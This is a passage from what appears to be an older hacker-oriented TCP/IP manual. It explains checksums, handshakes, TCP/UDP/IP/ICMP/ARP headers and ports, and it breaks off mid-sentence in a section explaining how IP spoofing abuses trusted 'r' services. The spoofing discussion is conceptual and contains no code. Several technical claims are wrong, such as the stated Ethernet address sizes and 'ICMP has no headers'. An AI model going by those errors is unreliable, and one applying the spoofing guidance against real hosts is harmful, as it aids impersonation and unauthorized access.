/&gt;source  to destination or any corruption in the communication channel which may have caused data loss.&lt;br /&gt;Data Corruption is detected by the Checksum Values and by performing Cyclic Redundancy Checks&lt;br /&gt;(CRC 's). CRC 's too like the Checksums are integer values but require intensely advanced calculation and&lt;br /&gt;hence are rarely used.&lt;br /&gt;&lt;br /&gt;There is yet another way of detecting data corruption-:  Handshaking.&lt;br /&gt;&lt;br /&gt;This feature ensures demands that both the source and destination must transmit and receive&lt;br /&gt;acknowledgement messages, that confirm transfer of uncorrupted data. Such acknowledgement messages&lt;br /&gt;are known as ACK messages.&lt;br /&gt;&lt;br /&gt;Let's take an example of a typical scenario of data transfer between two systems.&lt;br /&gt;Source Sends MSG1 to Destination.  It will not send MSG2 to Destination unless and until it gets the MSG&lt;br /&gt;ACK and destination will not send more requests for data or the next request message (MSG2) unless it&lt;br /&gt;gets the ACK from Source confirming that the MSG1 ACK was received by it. If the source does not get a&lt;br /&gt;ACK message from the destination, then something which is called a timed-out occurs and the source will&lt;br /&gt;re send the data to destination.&lt;br /&gt;&lt;br /&gt;So this means that if A sends a data packet to B and B checksums the data packet and finds the data&lt;br /&gt;corrupted, then it can simply delete for a time out to take place. Once the time out takes place, A will re&lt;br /&gt;send the data packet to B. But this kind of system of deleting corrupt data is not used as it is inefficient and&lt;br /&gt;time consuming.&lt;br /&gt;&lt;br /&gt;Instead of deleting the corrupt data and waiting for a time out to take place, the destination (B) sends a not&lt;br /&gt;acknowledged or NACK message to source(A). When A gets the NACK message, instead of waiting for a&lt;br /&gt;time out to take place, it straightaway resends the data packet.&lt;br /&gt;&lt;br /&gt;An ACK message of 1000 would mean that all data up to 1000 octets has been received till now.&lt;br /&gt;&lt;br /&gt;TCP/ IP is a layered suite of protocols. All layers are equally important and with the absence of even a&lt;br /&gt;single layer, data transfer would not have been possible. Each TCP/ IP layer contributes to the entire&lt;br /&gt;process of data transfer. An excellent example, is when you send an email. For sending mail there is a&lt;br /&gt;separate protocol, the SMTP protocol which belongs to the Application layer. The SMTP Application&lt;br /&gt;protocol like all other application layer protocols assumes  that there is a reliable connection existing&lt;br /&gt;between the two computers. For the SMTP application protocol to do what it is designed for, i.e. to send&lt;br /&gt;mail, it requires the existence of all other Layers as well. The Physical Layer i.e. cables and wires  is&lt;br /&gt;required to transport the data physically. The Transmission Control Protocol or the TCP protocol which&lt;br /&gt;belongs to the Transport Layer is needed to keep track of the number of packets sent and for error&lt;br /&gt;correction. It is this protocol that makes sure that the data reaches the other end. The TCP protocol is called&lt;br /&gt;by the Application Protocol to ensure error free communication between the source and destination. For the&lt;br /&gt;TCP layer to do its work properly i.e. to ensure that the data packets reach the destination, it requires the&lt;br /&gt;existence of the Internet Protocol or IP.  The IP protocol contains the Checksum and Source and&lt;br /&gt;Destination IP address.&lt;br /&gt;&lt;br /&gt;You may wonder why do we need different protocols like TCP and IP and why not bundle them into the&lt;br /&gt;same Application protocol.? The TCP protocol contains commands or functions which are needed by&lt;br /&gt;various application protocols like FTP, SMTP and also HTTP. The TCP protocol also calls on the IP&lt;br /&gt;protocol, which in turn contains commands or functions which some application protocols require while&lt;br /&gt;others don?t. So rather than bundling the entire TCP and IP protocol set into specific application protocols,&lt;br /&gt;it is better to have different protocols which are called whenever required.&lt;br /&gt;&lt;br /&gt;The Link Layer which is the Hardware or Ethernet layer is also needed for transportation of the data&lt;br /&gt;packets. The PPP or the Point to Point Protocol belongs to this layer. Before we go on let's get accustomed&lt;br /&gt;with certain TCP\IP terms. Most people get confused between datagrams and packets and think that they&lt;br /&gt;are one and the same thing . You see, a datagram is a unit of data which is used by various protocols and a&lt;br /&gt;packet is a physical object or thing which moves on a physical medium like a wire. There is a remarkable&lt;br /&gt;difference between a Packet and a Datagram, but it is beyond the scope of this book. To make things easier&lt;br /&gt;I will use only the term datagram (Actually this is the official term.)while discussing various protocols.&lt;br /&gt;&lt;br /&gt;Two different main protocols are involved in transporting packets from source to destination.&lt;br /&gt;&lt;br /&gt;1.) The Transmission Control Protocol or the TCP Protocol&lt;br /&gt;2.) The Internet Protocol or the IP protocol.&lt;br /&gt;&lt;br /&gt;Besides these two main protocols, the Physical Layer and the Ethernet Layer are also indispensable to data&lt;br /&gt;transfer.&lt;br /&gt;&lt;br /&gt;THE TRANSPORT LAYER&lt;br /&gt;&lt;br /&gt;The TCP protocol&lt;br /&gt;&lt;br /&gt;The Transmission Control Protocol is responsible for breaking up the data into smaller datagrams and&lt;br /&gt;putting the datagrams back to form usable data at the destination. It also resends the lost datagrams to&lt;br /&gt;destination where the received datagrams are reassembled in the right order. The TCP protocol does the&lt;br /&gt;bulk of work but without the IP protocol, it cannot transfer data.&lt;br /&gt;&lt;br /&gt;Let's take an example to make things more clearer. Let's say your Internet Protocol Address or IP address is&lt;br /&gt;xxx.xxx.xxx.xxx or simply x and the destination's IP is yyy.yyy.yyy.yyy or simply y.  Now As soon as the&lt;br /&gt;three-way connection  is established between x and y, x knows the destination IP address and also the Port&lt;br /&gt;to which it is connected to. Both x and y are in different networks which can handle different sized packets.&lt;br /&gt;So in order to send datagrams which are in receivable size, x must know what is the maximum datagram&lt;br /&gt;size which y can handle. This too is determined by both x and y during connection time.&lt;br /&gt;&lt;br /&gt;So once x knows the maximum size of the datagram which y can handle, it breaks down the data into&lt;br /&gt;smaller chunks or datagrams. Each datagram has it's own TCP header which too is put by TCP.&lt;br /&gt;A TCP Header contains a lot of information, but the most important of it is the Source and Destination IP&lt;br /&gt;and Port numbers and yes also the sequence number.&lt;br /&gt;&lt;br /&gt;**************&lt;br /&gt;HACKING TRUTH: Learn more about Ports, IP's, Sockets in the Net Tools Manual&lt;br /&gt;**************&lt;br /&gt;The source which is your computer(x) now knows what the IP Addresses and Port Numbers of the&lt;br /&gt;Destination and Source computers are. It now calculates the Checksum value by adding up all the octets of&lt;br /&gt;the datagram and puts the final checksum value to the TCP Header. The different octets and not the&lt;br /&gt;datagrams are then numbered. An octet would be a smaller broken down form of the entire data. TCP then&lt;br /&gt;puts all this information into the TCP header of each datagram. A TCP Header of a datagram would finally&lt;br /&gt;look like -:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+&lt;br /&gt; |          Source Port          |       Destination Port        |&lt;br /&gt; +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+&lt;br /&gt; |                        Sequence Number                        |&lt;br /&gt; +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+&lt;br /&gt; |                    Acknowledgment Number                      |&lt;br /&gt; +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+&lt;br /&gt; |  Data |           |U|A|P|R|S|F|                               |&lt;br /&gt; | Offset| Reserved  |R|C|S|S|Y|I|            Window             |&lt;br /&gt; |       |           |G|K|H|T|N|N|                               |&lt;br /&gt; +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+&lt;br /&gt; |           Checksum            |         Urgent Pointer        |&lt;br /&gt; +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+&lt;br /&gt; |   The Actual Data form the next 500 octets                    |&lt;br /&gt; |                                                               |&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;There are certain new fields in the TCP header which you may not know off. Let's see what these new&lt;br /&gt;fields signify. The Windows field specifies the octets of new data which is ready to be processed. You see&lt;br /&gt;not all computers connected to the Internet run at the same speed and to ensure that a faster system does not&lt;br /&gt;send datagrams to a slow system at a rate which is faster than it can handle, we use the Window field. As&lt;br /&gt;the computer receives data , the space in the Window field gets decreased indicating that the receiver has&lt;br /&gt;received the data. When it reaches zero the sender stops sending further packets. Once the receiver finishes&lt;br /&gt;processing the received data, it increases the Window field, which in turn indicates that the receiver has&lt;br /&gt;processed the earlier sent data and is ready to receive more chunks of data.&lt;br /&gt;&lt;br /&gt;The Urgent Field tells the remote computer to stop processing the last octet and instead receive the new&lt;br /&gt;octet. This is normally not commonly used.&lt;br /&gt;&lt;br /&gt;The TCP protocol is a reliable protocol, which means that we have a guarantee that the data will arrive at&lt;br /&gt;the destination properly and without any errors.  It ensures that the data being received by the receiving end&lt;br /&gt;is arranged in the same correct order in which it was sent.&lt;br /&gt;&lt;br /&gt;The TCP Protocol relies on a virtual circuit between the client and the host. The circuit is opened via a 3&lt;br /&gt;part process known as the three part handshake. It supports full duplex transportation of data which means&lt;br /&gt;that it provides a path for two way data transfer. Hence using the TCP protocol, a computer can send and&lt;br /&gt;receive datagrams at the same time.&lt;br /&gt;&lt;br /&gt;Some common flags of TCP are-:&lt;br /&gt;&lt;br /&gt;RST [RESET]- Resets the connection.&lt;br /&gt;PSH [PUSH]  - Tells receiver to pass all  queued data  to the application running.&lt;br /&gt;FIN [FINISH] - Closes connection following the 4 step process.&lt;br /&gt;SYN Flag      - means that the machine sending this flag wants to establish a three way handshake i.e.&lt;br /&gt;                      a TCP connection. The receiver of a SYN flag usually responds with an ACK message.&lt;br /&gt;&lt;br /&gt;So now we are in a position to represent a three way TCP Handshake:&lt;br /&gt;&lt;br /&gt;A    &lt;---SYN---&gt;          B&lt;br /&gt;A     &lt;---SYN/ACK?  B A     &lt;---ACK---&gt;         B&lt;br /&gt;&lt;br /&gt;A sends a SYN flag to B saying  " I want to establish a TCP connection", B responds to the SYN with the&lt;br /&gt;ACK to the SYN flag. A again responds to the ACK sent by B with another ACK.&lt;br /&gt;&lt;br /&gt;Read RFC 793 for further in depth details about the TCP protocol.&lt;br /&gt;&lt;br /&gt;The User Datagram Protocol or the UDP Protocol&lt;br /&gt;&lt;br /&gt;The User Data protocol or the UDP is yet another protocol which is a member of the Transport Layer. TCP&lt;br /&gt;is the standard protocol used by all systems for communications. TCP is used to break down the data to be&lt;br /&gt;transported into smaller datagrams, before they (the datagrams) are sent across a network. Thus we can say&lt;br /&gt;that TCP is used where more than a single or multiple datagrams are involved.&lt;br /&gt;&lt;br /&gt;Sometimes, the data to be transported is able to fit into a single datagram. We do not need to break the data&lt;br /&gt;into smaller datagrams as the size of the data is pretty small. The perfect example of such data is the DNS&lt;br /&gt;system. To send out the query for a particular domain name, a single datagram is more than enough. Also&lt;br /&gt;the IP that is returned by the Domain Name  Server does not require more than one datagram for&lt;br /&gt;transportation. So in such cases instead of making use of the complex TCP protocol, applications fall back&lt;br /&gt;to the UDP protocol.&lt;br /&gt;&lt;br /&gt;The UDP protocol works almost the way TCP works. But the only differences being that TCP breaks the&lt;br /&gt;data to be transferred into smaller chunks, does sequencing by inserting  a sequence number in the header&lt;br /&gt;and no error control. Thus we can conclude by saying that the UDP protocol is an unreliable protocol with&lt;br /&gt;no way to confirm that the data has reached the destination.&lt;br /&gt;&lt;br /&gt;The UDP protocol does insert a USP header to the single datagram it is transporting. The UDP header&lt;br /&gt;contains the Source and Destination IP Addresses and Port Numbers and also the Checksum value. The&lt;br /&gt;UDP header is comparatively smaller than the TCP Header.&lt;br /&gt;&lt;br /&gt;It is used by those applications where small chunks of data are involved. It offers services to the User's&lt;br /&gt;Network Applications like NFS(Network File Sharing) and SNMP.&lt;br /&gt;&lt;br /&gt;Read RFC 768 for further in depth details about the UDP protocol.&lt;br /&gt;&lt;br /&gt;THE NETWORK LAYER&lt;br /&gt;&lt;br /&gt;The IP Protocol&lt;br /&gt;&lt;br /&gt;Both the TCP and the UDP protocols, after inserting the headers to the datagram(s) given to them pass&lt;br /&gt;them to the Internet Protocol or the IP Protocol.  The main job of the IP protocol is to find a way of&lt;br /&gt;transporting the datagrams to the destination receiver. It does not do any kind of error checking.&lt;br /&gt;&lt;br /&gt;The IP protocol too adds it's own IP Header to each datagram. The IP header contains the source and&lt;br /&gt;destination IP addresses, the protocol number and yet another checksum. The IP header of a particular&lt;br /&gt;datagram looks like-:&lt;br /&gt;&lt;br /&gt; +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+&lt;br /&gt; |Version|  IHL  |Type of Service|          Total Length         |&lt;br /&gt; +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+&lt;br /&gt; |         Identification        |Flags|      Fragment Offset    |&lt;br /&gt; +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+&lt;br /&gt; |  Time to Live |    Protocol   |         Header Checksum       |&lt;br /&gt; +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+&lt;br /&gt; |                       Source Address                          |&lt;br /&gt; +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+&lt;br /&gt; |                    Destination Address                        |&lt;br /&gt; +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+&lt;br /&gt; |  TCP header info followed by the actual data being transferred|&lt;br /&gt; |                                                               |&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The Source and destination IP addresses and needed so that?well it is obvious isn't it? The Protocol&lt;br /&gt;number is added so that the IP protocol knows to which Transport Protocol the datagram has to be passed.&lt;br /&gt;You see various Transport Protocols are used like for example TCP or UDP. So this protocol number is&lt;br /&gt;inserted to tell IP the protocol to which the datagram has to be passed.&lt;br /&gt;&lt;br /&gt;It too inserts it's own Checksum value which is different from the Checksum Value inserted by the&lt;br /&gt;Transport Protocols. This Checksum has to be inserted as without it the Internet Protocol will not be able to&lt;br /&gt;verify if the Header has been damaged in the transfer process and hence the datagram might reach a wrong&lt;br /&gt;destination. The Time to Live field specifies a value which is decreased each time the datagram passes&lt;br /&gt;through a network. Remember Tracert?&lt;br /&gt;&lt;br /&gt;The Internet Protocol Header contains other fields as well, but they are quite advanced and cannot be&lt;br /&gt;included in a manual which gives an introduction to the TCP\IP protocol. To learn more about the IP&lt;br /&gt;protocol read RFC 791.&lt;br /&gt;&lt;br /&gt;The Internet Control Message Protocol or the ICMP&lt;br /&gt;&lt;br /&gt;The ICMP protocol allows hosts to transfer information on errors that might have occurred during the data&lt;br /&gt;transfer between two hosts.  It is basically used to display error messages about errors that might occur&lt;br /&gt;during the data transfer. The ICMP is a very simple protocol without any headers. It is most commonly&lt;br /&gt;used to diagnose Network Problems. The famous utility PING is a part of the ICMP protocol. ICMP&lt;br /&gt;requests do not require the user or application to mention any port number as all ICMP requests are&lt;br /&gt;answered by the Network Software itself. The ICMP protocol too handles only a single datagram. That's&lt;br /&gt;why we say in PING only a single datagram is sent to the remote computer. This protocol can remote many&lt;br /&gt;network problems like Host Down, Congested Network etc&lt;br /&gt;&lt;br /&gt;Read RFC 792 for further in depth details about the ICMP protocol.&lt;br /&gt;&lt;br /&gt;The Link Layer&lt;br /&gt;&lt;br /&gt;Almost all networks use Ethernet. Each machine in a network has it's own IP address and it's Ether&lt;br /&gt;Address. The Ether Address of a computer is different than it's IP address. An Ether Address is a 42 bit&lt;br /&gt;address while the IP address is only a 32 bit address. A Network must know which computer to deliver the&lt;br /&gt;datagram to. Right? For this the Ether Header is used.&lt;br /&gt;&lt;br /&gt;The Ether Header is a 14 octet header that contains the Source and Destination Ethernet address, and a type&lt;br /&gt;code. Ether too calculates it's own Checksum value. The Type code relates to the protocol families to be&lt;br /&gt;used within the Network. The Ether Layer passes the datagram to the protocol specified by this field after&lt;br /&gt;inserting the Ether Header. There is simply no connection between the Ethernet Address and the IP address&lt;br /&gt;of a machine. Each machine needs to have a Ethernet to IP address translation table on its hard disk.&lt;br /&gt;&lt;br /&gt; +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+&lt;br /&gt; |       Ethernet destination address (first 32 bits)                                         |&lt;br /&gt; +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+&lt;br /&gt; | Ethernet dest (last 16 bits)          |Ethernet source (first 16 bits)              |&lt;br /&gt; +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+&lt;br /&gt; |       Ethernet source address (last 32 bits)                                                 |&lt;br /&gt; +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+&lt;br /&gt; |        Type code                                                                                          |&lt;br /&gt; +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+&lt;br /&gt; |  IP header, then TCP header, then your data                                            |&lt;br /&gt; |                                                                                                                   |&lt;br /&gt; |                                                                                                                   |&lt;br /&gt; |                           |&lt;br /&gt; +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+&lt;br /&gt; |                       Ethernet Checksum                                                             |&lt;br /&gt; +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+&lt;br /&gt;&lt;br /&gt;Address Resolution Protocol or ARP&lt;br /&gt;&lt;br /&gt;Data before being transmitted across the Internet or across a local network is broken down into smaller&lt;br /&gt;Packets which are suitable for transfer over the net. These packets have the Source and Destination IP's but&lt;br /&gt;for the transfer to take place the suitable Hardware Addresses or the MAC addresses must also be known.&lt;br /&gt;That is where ARP comes in.&lt;br /&gt;&lt;br /&gt;To get the Hardware MAC addresses, ARP or Address Resolution Protocol sends a request message. The&lt;br /&gt;Router replies with the Hardware Address. It is similar to the DNS and it too has a cache. This cache can be&lt;br /&gt;a bit vulnerable as a Hacker could forge a connection from a remote machine claiming to be one of the&lt;br /&gt;cached locations. So we can conclude that ARP translates IP's into Ethernet Addresses. One thing to&lt;br /&gt;remember about ARP is that it only translates outgoing packets.&lt;br /&gt;&lt;br /&gt;There is also something called the RARP which is an abbreviation for Reverse Address Resolution&lt;br /&gt;Protocol, which like the name says does exactly reverse of what ARP does.&lt;br /&gt;&lt;br /&gt;There is simply no algorithm to get the Ethernet Address from the IP Address. To carry out such&lt;br /&gt;translations, each computer has a file which has a table with rows for each computer and two columns for&lt;br /&gt;their corresponding IP address and Ethernet Address. The File is somewhat like the following-:&lt;br /&gt;&lt;br /&gt;                                   Internet Protocol Address                         Ethernet Address&lt;br /&gt;Computer Name              xxx.xy.yy.yx                                           08-00-39-00-2F-C3&lt;br /&gt;&lt;br /&gt;Say there are a system in a Network (A) and an unidentified system (B) contacts it. Now A only knows the&lt;br /&gt;IP address of B. Now A will first try to identify whether B is the same network so that it can directly&lt;br /&gt;communicate via Ethernet. So it will first check the IP to MAC address translation table which it has. If it&lt;br /&gt;finds the IP in the table then well and good and A will establish a connection with B via Ethernet.&lt;br /&gt;&lt;br /&gt;On the Other hand if A does not find any match for the specific IP, it will send out a request in the form of&lt;br /&gt;a 'Broadcast'. All computers within the Network will receive this broadcast and will search their own IP to&lt;br /&gt;MAC translation table and will reply with the necessary MAC address. A basic difference between an Ip&lt;br /&gt;address and MAC address is that an IP is the form xxx.xxx.xxx.xxx and a MAC address is in the form&lt;br /&gt;xx:xx:xx:xx:xx:xx and one is 32 bit while the other is 40 bit.&lt;br /&gt;&lt;br /&gt;Read RFC 826 for further in depth details about the ARP protocol.&lt;br /&gt;&lt;br /&gt;Application Layer&lt;br /&gt;&lt;br /&gt;Till now  you  have learnt  how data is broken down into smaller chunks, and transferred to the destination,&lt;br /&gt;where the chunks are rearranged. But there is yet another aspect to a successful data transfer process, which&lt;br /&gt;we have not discussed yet: The Application Protocols and the Application Layer itself. A host which&lt;br /&gt;receives datagrams has many applications or services (daemons) running which are ready to establish a&lt;br /&gt;TCP connection and accept a message. Datagrams travelling on the Internet must know which application&lt;br /&gt;they have to establish connection with, which application they have to send the message to. A typical web&lt;br /&gt;server will have the FTP daemon, the HTTP daemon, the POP daemon, and the SMTP daemon running.&lt;br /&gt;Wouldn't the datagrams get confused as to which daemon to send the message to.&lt;br /&gt;&lt;br /&gt;For the datagrams to know which computer to send the message to, we have IP addresses. The datagram&lt;br /&gt;knows what daemon or application to send the message to by the Port Number attached to the IP address of&lt;br /&gt;the Destination. A TCP address is actually fully described by 4 numbers; The IP address of the Source and&lt;br /&gt;Destination and the TCP Port Numbers of each end to which data is to be sent. These numbers are found in&lt;br /&gt;the TCP Header.&lt;br /&gt;&lt;br /&gt;To make it simpler to understand I have included an excerpt from the Net Tools Chapter:&lt;br /&gt;&lt;br /&gt;What is all the hype about socket programming? What exactly are sockets?&lt;br /&gt;&lt;br /&gt;TCP\IP or Transmission Control Protocol\ Internet Protocol is the language or the protocol used by&lt;br /&gt;computers to communicate with each other over the Internet. Say a computer whose IP address is&lt;br /&gt;99.99.99.99 wants to communicate with another machine whose IP address is 98.98.98.98 then would will&lt;br /&gt;happen?&lt;br /&gt;&lt;br /&gt;The machine whose IP is 99.99.99.99 sends a packet addressed to another machine whose IP is&lt;br /&gt;98.98.98.98. When 98.98.98.98 receives the packet then it verifies that it got the message by sending a&lt;br /&gt;signal back to 99.99.99.99.But say the person who is using 99.99.99.99 wants to have simultaneously  more&lt;br /&gt;than one connections to 98.98.98.98.....then what will happen? Say 99.99.99.99 wants to connect to&lt;br /&gt;the FTP daemon and download a file by FTP and at the same time it wants to connect to 98.98.98.98's&lt;br /&gt;website i.e. The HTTP daemon. Then 98.98.98.98. will have 2 connects with 99.99.99.99 simultaneously.&lt;br /&gt;Now how can 98.98.98.98.distinguish between the two connections...how does 98.98.98.98. know which&lt;br /&gt;is for the FTP daemon and which for the HTTP daemon? If there was no way to distinguish between the&lt;br /&gt;two connections then they would both get mixed up and there would be a lot of chaos with the message&lt;br /&gt;meant for the HTTP daemon going to the FTP daemon. To avoid such confusion we have ports. At each&lt;br /&gt;port a particular service or daemon is running by default. So now that the 99.99.99.99 computers knows&lt;br /&gt;which port to connect to, to download a FTP file and which port to connect to, to download the web page,&lt;br /&gt;it will communicate with the 98.98.98.98 machine using what is known as the socket pair which is a&lt;br /&gt;combination of an IP address and a Port. So in the above case the message which is meant for the FTP&lt;br /&gt;daemon  will be addressed to 98.98.98.98 : 21 (Notice the colon and the default FTP port suceeding it.).&lt;br /&gt;So that the receiving machine i.e. 98.98.98.98 will know for which service this message is meant for and to&lt;br /&gt;which port it should be directed to.&lt;br /&gt;&lt;br /&gt;In TCP\IP or over the Internet all communication is done using the Socket pair i.e. the combination of the&lt;br /&gt;IP address and the port.&lt;br /&gt;&lt;br /&gt;*****************&lt;br /&gt;HACKING TRUTH: Learn More about Ports, IP addresses and Sockets by reading the Net Tools Chapter.&lt;br /&gt;*****************&lt;br /&gt;The Application Layers basically consists of the Applications running on your computer and the&lt;br /&gt;Applications running on the host to which you are connected. Say you are viewing the Hotmail Site, then&lt;br /&gt;the application layer comprises of the Web Browser running on your computer and the HTTP daemon&lt;br /&gt;running at Hotmail's server and the Application Protocol being used to communicate is HyperText Transfer&lt;br /&gt;Protocol.&lt;br /&gt;&lt;br /&gt;As soon as a TCP connection is established the Applications running on Each end decide the language or&lt;br /&gt;protocol to be used to communicate and send datagrams.&lt;br /&gt;&lt;br /&gt;IP Spoofing Torn Apart&lt;br /&gt;&lt;br /&gt;IP spoofing is the most exciting topic you will hear wannabe hackers talking about. It is also a subject&lt;br /&gt;about which no one knows much. Before we continue I would like to tell you that IP Spoofing is quite&lt;br /&gt;difficult to understand and a lot of people have trouble understanding how it is done. The other downside it&lt;br /&gt;has is the fact that it can almost not be done using a Windows system and a system administrator can easily&lt;br /&gt;protect his system from IP spoofing&lt;br /&gt;&lt;br /&gt;So what is IP Spoofing? IP Spoofing is a trick played on servers to fool the target computer into thinking&lt;br /&gt;that it is receiving data from a source other than you. This in turn basically means to send data to a remote&lt;br /&gt;host so that it believes that the data is coming from a computer whose IP address is something other than&lt;br /&gt;yours. Let's take an example to make it clear:&lt;br /&gt;&lt;br /&gt;Your IP is : 203.45.98.01 (REAL)&lt;br /&gt;IP of Victim computer is: 202.14.12.1 (VICTIM)&lt;br /&gt;IP you want data to be sent from: 173.23.45.89 (FAKE)&lt;br /&gt;&lt;br /&gt;Normally sitting on the computer whose IP is REAL, the datagrams you send to VICTIM will appear to&lt;br /&gt;have come from REAL. Now consider a situation in which you want to send a datagram to VICTIM and&lt;br /&gt;make him believe that it came from a computer whose IP is FAKE. This is when you perform IP Spoofing.&lt;br /&gt;&lt;br /&gt;The Main problem with IP Spoofing is that even if you are able to send a spoofed datagram to the remote&lt;br /&gt;host, the remote host will reply not to your real IP but to the Fake IP you made your datagram seem to have&lt;br /&gt;come from. Getting confused? Read the following example to clear up your mind.&lt;br /&gt;&lt;br /&gt;Taking the same IP's as in the last example, consider the following scenario. Now, if REAL connects to&lt;br /&gt;VICTIM, after the standard three way handshake has taken place, and VICTIM sends an ACK message to&lt;br /&gt;REAL. Now if you spoof you IP, to say FAKE, then VICTIM will try to establish a TCP connection and&lt;br /&gt;will send an ACK message to FAKE. Now lets assume that FAKE is alive, then as it had not requested the&lt;br /&gt;ACK message (sent by VICTIM to FAKE) it will reply with a NACK message which would basically end&lt;br /&gt;the connection and no further communication between FAKE and VICTIM would take place. Now if&lt;br /&gt;FAKE doesn't exist then the ACK message sent by VICTIM will not get any reply and in the end the&lt;br /&gt;connection times out.&lt;br /&gt;&lt;br /&gt;Due to this FAKE and REAL IP reasons, when a person is trying to perform an IP Spoof, he does not get&lt;br /&gt;any response from the remote host and has no clue whether he has been successful or not. If he has made&lt;br /&gt;any progress or not. You are as good as blind, with no medium through which you could get feedback.&lt;br /&gt;&lt;br /&gt;IP Spoofing can be successful only if the computer with the FAKE IP does not reply to the victim and not&lt;br /&gt;interrupt the spoofed connection.  Take the example of a telephone conversation, you can call up a person&lt;br /&gt;' x ' and pretend to be ' y ' as long as ' y ' does not interrupt the conversation and give the game away.&lt;br /&gt;&lt;br /&gt;So why would you need to perform IP Spoofing-:&lt;br /&gt;&lt;br /&gt;1.) To Pretend that you are some other computer whose IP address is amongst the trusted list of computers&lt;br /&gt;on the victim's disk. This way you are exploit the 'r' services and gain access to the network as you are&lt;br /&gt;then believed to be from a trusted source.&lt;br /&gt;2.) To Disguise or Mask your IP address so that the victim does not know who you really are and where&lt;br /&gt;the data is coming from.&lt;br /&gt;&lt;br /&gt;If you ever read the alt.2600 or the alt.hacking newsgroup, you would probably find many postings like "I&lt;br /&gt;have Win98, how do I Spoof my IP" or even " I do not know TCP/IP. tell me how to perform IP spoofing".&lt;br /&gt;You see the very fact that they are posting such questions and expect to learn how to spoof their IP without&lt;br /&gt;even knowing a bit about TCP\IP, confirms the fact that they would not be able to perform IP Spoofing. No&lt;br /&gt;I am not saying that asking questions is bad, but you see not knowing something is not so bad, but not&lt;br /&gt;knowing something and showing ignorance towards learning it is really, really bad.&lt;br /&gt;&lt;br /&gt;You see IP spoofing is a very complex and difficult to perform subject. You need to hog entire TCP/IP and&lt;br /&gt;Networking Protocols manuals and need to be able to write C programs which will help you in the&lt;br /&gt;Spoofing process. It is amazing how people even think that they can spoof their IP without even knowing&lt;br /&gt;what TCP/IP stands for.&lt;br /&gt;&lt;br /&gt;You see all packets travelling across the Internet have headers which contain the source and destination IP&lt;br /&gt;addresses and port numbers, so that the packet knows where to go and the destination knows where the&lt;br /&gt;packet has come from and where to respond. Now the process of Spoofing means to change the source IP&lt;br /&gt;address contains by the Header of the packet, in turn fooling the receiver of the Packets into believing that&lt;br /&gt;the packet came from somewhere else, which is a fake IP. Now let's again look at the IP Header of a&lt;br /&gt;datagram.&lt;br /&gt;&lt;br /&gt;+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+&lt;br /&gt; |Version|  IHL  |Type of Service|          Total Length         |&lt;br /&gt; +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+&lt;br /&gt; |         Identification        |Flags|      Fragment Offset    |&lt;br /&gt; +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+&lt;br /&gt; |  Time to Live |    Protocol   |         Header Checksum       |&lt;br /&gt; +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+&lt;br /&gt; |                       Source Address                          |&lt;br /&gt; +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+&lt;br /&gt; |                    Destination Address                        |&lt;br /&gt; +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+&lt;br /&gt; |  TCP header info followed by the actual data being transferred             |&lt;br /&gt; |&lt;br /&gt;&lt;br /&gt;Now basically to perform IP spoofing we need to be able to change the value of the field, Source Address.&lt;br /&gt;Now to this you need to be able to guess sequence numbers which is quite a sophisticated process and I will&lt;br /&gt;try to explain it as clearly as possible. Before we go on, you need to understand the fact the IP spoofing is&lt;br /&gt;not the entire process, it is just a stepping stop in the entire process of fooling the remote host and&lt;br /&gt;establishing a trust relationship with the remote host.&lt;br /&gt;&lt;br /&gt;So how do these trust relationships take place? Well all of you are encountered with some form of&lt;br 